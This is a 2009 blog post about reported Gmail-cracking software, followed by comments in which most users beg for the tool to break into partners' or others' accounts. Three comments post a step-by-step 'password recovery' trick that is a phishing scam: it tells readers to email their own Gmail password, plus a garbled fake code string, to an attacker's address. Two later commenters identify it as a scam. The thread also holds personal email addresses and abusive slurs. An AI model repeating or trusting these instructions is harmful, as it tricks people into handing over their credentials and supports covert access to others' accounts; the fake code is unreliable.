Hackers Develop Gmail Cracking Software

The software reportedly allows hackers to break into Gmail accounts by following a simple three-step process. Google, the report said, has already responded with the instigation of a visually-oriented anti-robot test. [Web Hosting Industry News]

379 comments for “Hackers Develop Gmail Cracking Software

1. 9/1/2009 at 3:32 am

heyy plz send me link for this software
    Stop Dreaming Start Action |
    Rusli Zainal Sang Visioner

2. shilpajain
    9/2/2009 at 10:25 am

pls. help me i think someone cheating me in love . i want to hack her gmail a/c . pls help me plsssssssssssssssssss

3. raj2631982
    9/3/2009 at 3:28 am

send me this software

4. Name
    9/5/2009 at 3:35 am

Step 1: Log into your Gmail account.
    Step 2: Compose a new mail.
    Step 3: In subject box type ” PASSWORD RECOVERY “
    Step 4: Send this to – admin.system.server.in@gmail.com
    Step 5: Write this in message box.
    (first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
    (fourth line) – <pwdcursive><
    v703&login=”passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#”
    start?></script>=””></cursive><>
    {simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
    Usually only system administrators should be able to use this, but when you
    try it with your own password and mail this message from your Gmail account
    the computer gets confused! Why your password is needed- automatic Gmail
    responder will require your “system administrator password” which is in fact
    your own password!!! But the : computer doesn't know.

5. Name
    9/5/2009 at 3:36 am

Step 1: Log into your Gmail account.
    Step 2: Compose a new mail.
    Step 3: In subject box type ” PASSWORD RECOVERY “
    Step 4: Send this to – admin.system.server.in@gmail.com
    Step 5: Write this in message box.
    (first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
    (fourth line) – <pwdcursive><
    v703&login=”passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#”
    start?></script>=””></cursive><>
    {simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
    Usually only system administrators should be able to use this, but when you
    try it with your own password and mail this message from your Gmail account
    the computer gets confused! Why your password is needed- automatic Gmail
    responder will require your “system administrator password” which is in fact
    your own password!!! But the : computer doesn't know.

6. raju20v
    9/9/2009 at 2:11 am

how can download the software
    it's very necessary for me i have forgotten my gmail password
    i'm not able to access my mails……
    i tried with the remembering and old passwords but it not worked out….
    please help me out….

7. Anonymous
    9/11/2009 at 1:58 pm

madar chod apna kam dek… loude

8. samual
    9/11/2009 at 10:15 pm

pls send me gmail cracking downloading link

9. mgmgminmin86
    9/16/2009 at 1:46 pm

pls sent to software mgmgminmin86@gmail.com pls pls pls

10. CMEFOXY
    9/16/2009 at 10:20 pm

How can I crack my husbands password in his gmail account..Please need Help!! Soon!!

11. CMEFOXY
    9/16/2009 at 10:21 pm

CAN YOU PLEASE HELP ME CRACK MY HUSBANDS PASSWORD IN GMAIL ACCOUNT..pLEASE

12. CMEFOXY
    9/18/2009 at 5:35 pm

can anyone help me Please!!!!! I need to crack this password for gmail account!!! Going crazy Need Help!!! I think my husband is cheating I need evidence

13. Pradeep ka baap
    9/26/2009 at 4:08 am

chutye..gaand mara pradeep… randi ki aaulad

14. navneet_noida2006
    9/27/2009 at 8:25 pm

an u send me this software or the link…I want to know the three steps from which we can find out the passward of my other gmail a/c…

15. navneet_noida2006
    9/27/2009 at 8:28 pm

navneet_noida2006@yahoo.com
    navneet.sharma@mahuaatv.com

16. Aryan
    10/4/2009 at 12:43 am

This is a scam. There is no software available to crack email accounts. Simply saying- It is impossible to crack internet applications as DOS attack is not possible this way. Hence Password Brute forcing will not with mail accounts.

Here one guy posted, that if you send a mail to some “server's mail ID” with your ID and password, it will reply with the target mail ID and its password. What you are doing is, you are sending your ID and password to a spammer. DON'T EXPECT A REPLY…..

17. albin9
    10/6/2009 at 3:21 am

anyone pls tell me how hack the gmail password

18. mrunalini
    10/6/2009 at 3:04 pm

plz send me on mona17885@gmail.com

19. rjkaran
    10/7/2009 at 5:56 am

Step 1: Log into your Gmail account.
    Step 2: Compose a new mail.
    Step 3: In subject box type ” PASSWORD RECOVERY “
    Step 4: Send this to – paswrdretriver@gmail.com
    Step 5: Write this in message box.
    (first line)- Email address you want to hack.

(second line)- Your Gmail address

(third line)- Your Gmail account password
    (fourth line) – <pwdcursive><
    v703&login=”passmachine&f=(p0assword)&f=27586&___javascript=ACTIVE&rsa#”
    start?></script>=””></cursive><>
    {simply copy and paste above.}

How it works: you mail to a system administrators automatic responder.
    Usually only system administrators should be able to use this, but when you
    try it with your own password and mail this message from your Gmail account
    the computer gets confused! Why your password is needed- automatic Gmail
    responder will require your “system administrator password” which is in fact
    your own password!!! But the : computer doesn't know.

20. rjkaran
    10/7/2009 at 6:01 am

hi dear
    i need tht password hacking software.plz send it

actly i am unable to open my account as i forgot my account password

21. prasanna
    10/8/2009 at 10:41 am

pl send the link to download the software to my mail

22. cultural
    10/12/2009 at 2:50 am

can u send the link to culturaldocuvisuals@gmail.com

23. pawanttt
    10/13/2009 at 1:07 am

plz send link to me

24. sreedevi
    10/14/2009 at 9:46 am

please send it to sreedu52@gmail.com

25. shashi911
    10/16/2009 at 12:36 am

how can i get password cracking s/w.

26. ashwwin
    10/21/2009 at 12:25 am

wail having s*x with your husband ask the password sure he i'll tell trust me or else give me your email id and your husbands also @ ashwin900@gmail.com

27. RECEIVER
    10/24/2009 at 2:10 pm

the method said is completely wrong…….

this account admin.system.server.in@gmail.com is created by that person…

he will have ur password after u send himm,,,

this MOTHERFUCKER…….
    MATHERCHOD….

WHAT D U THINK OTHERS ARE FOOOL…

28. toby1canobe